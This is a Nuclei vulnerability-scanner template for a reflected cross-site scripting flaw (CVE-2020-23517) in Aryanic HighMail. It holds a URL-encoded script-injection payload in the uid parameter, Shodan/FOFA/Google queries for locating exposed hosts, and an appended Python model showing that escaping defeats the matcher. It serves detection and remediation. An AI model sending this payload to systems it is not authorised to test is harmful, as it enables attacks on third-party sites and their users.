nuclei-templates/http/cves/2020/CVE-2020-23517.yaml

id: CVE-2020-23517

info:
  name: Aryanic HighMail (High CMS) - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23517
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-23517
    cwe-id: CWE-79
    epss-score: 0.00135
    epss-percentile: 0.48718
    cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: aryanic
    product: high_cms
    shodan-query:
      - title:"HighMail"
      - http.title:"highmail"
    fofa-query:
      - title="HighMail"
      - title="highmail"
    google-query: intitle:"highmail"
  tags: cve,cve2020,xss,cms,highmail,aryanic

http:
  - method: GET
    path:
      - "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
      - "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'value=""><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450220154df7868429b23b96e73af4e3eabceace22d921d859b41f9ca200509decb003022100ce2e68eccba5dea0c0077f4b1ccb54bfb3164f7add0893192dba06672e328afa:922c64590222798bb761d5b6d8e72950
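
Added example (not part of the nuclei-templates repository): a Python model of how the template's three matchers combine under matchers-condition: and, run against constructed responses, showing that HTML-escaping the reflected uid value makes the body matcher stop firing. The names render_login and template_matches are hypothetical, and the form markup is an assumed shape, not HighMail's actual page.

```python
import html
from urllib.parse import unquote

# Values copied from the template above.
PROBE = unquote("%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E")
BODY_WORD = 'value=""><script>alert(document.domain)</script>'

# Constructed response headers for the sample cases below.
HTML_HEADERS = {"Content-Type": "text/html; charset=utf-8"}
JSON_HEADERS = {"Content-Type": "application/json"}


def render_login(uid, escape):
    """Hypothetical login form that reflects uid into a value attribute.

    With escape=True the value is attribute-encoded (quotes included),
    which is the output sanitization the remediation field asks for.
    """
    shown = html.escape(uid, quote=True) if escape else uid
    return '<form><input name="uid" value="%s"></form>' % shown


def template_matches(status, headers, body):
    """Apply the template's three matchers; all must hold (condition: and)."""
    # "part: header" is modelled as the headers joined as "Name: value" lines.
    header_text = "\n".join("%s: %s" % kv for kv in headers.items())
    return (BODY_WORD in body               # word matcher on the body
            and "text/html" in header_text  # word matcher on the headers
            and status == 200)              # status matcher


def demo():
    """Evaluate the matchers over four constructed responses."""
    raw = render_login(PROBE, escape=False)
    safe = render_login(PROBE, escape=True)
    return {
        "unescaped reflection": template_matches(200, HTML_HEADERS, raw),
        "escaped reflection": template_matches(200, HTML_HEADERS, safe),
        "non-HTML response": template_matches(200, JSON_HEADERS, raw),
        "error status": template_matches(404, HTML_HEADERS, raw),
    }


if __name__ == "__main__":
    for case, hit in demo().items():
        print("%-22s %s" % (case, "match" if hit else "no match"))
```

Only the first case satisfies all three matchers; the header and status checks are what keep a raw echo in a JSON body or an error page from being reported.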